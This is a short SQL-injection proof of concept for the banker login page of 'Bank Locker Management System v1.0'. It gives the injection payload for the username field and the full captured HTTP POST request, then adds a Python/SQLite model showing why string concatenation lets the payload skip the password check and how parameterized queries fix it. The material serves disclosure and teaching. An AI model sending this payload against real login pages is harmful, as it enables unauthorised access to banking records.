Bank Locker Management System-v.1.0 POC
VENDOR-LOGIN-PAGE
VULNERABLE-PARAMETER: username
PAYLOAD USED: admin' AND 4719=4719-- GZHh
BURPSUITE: POST-REQUEST
POST /BLMS/banker/index.php HTTP/1.1
Host: localhost
Content-Length: 60
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BLMS/banker/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=0qu8r6atk2davkcc0gkm7a0e9p
Connection: close

username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=
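Added example (not part of the original POC and not the application's PHP code): a small SQLite model of why the username value in the request above changes the login query when input is concatenated into SQL, next to the parameterized form that fixes it. The table name, column names, stored password and query shape are assumptions, since the page does not show the application's source.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body exactly as captured in the POST request on this page.
BODY = "username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login="


def make_db():
    """Constructed sample data: one banker account (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE banker (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to keep the model short; real code stores a hash.
    db.execute("INSERT INTO banker (username, password) VALUES ('admin', 'correct-horse')")
    return db


def decode_form(body):
    """URL-decode the form fields the way the server sees them."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields["username"][0], fields["inputpwd"][0]


def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: input is pasted into the SQL text, so the
    quote closes the string and '--' comments out the password check."""
    sql = ("SELECT id FROM banker WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    """Hardened form: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT id FROM banker WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    user, pwd = decode_form(BODY)
    print("decoded username:", repr(user))
    print("concatenated query accepts login:", login_concatenated(db, user, pwd))
    print("parameterized query accepts login:", login_parameterized(db, user, pwd))
```

In the PHP application the equivalent fix is a prepared statement (mysqli or PDO) with bound parameters for the username and password fields.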
VIDEO-POC
POC-SQL-BLMS.mp4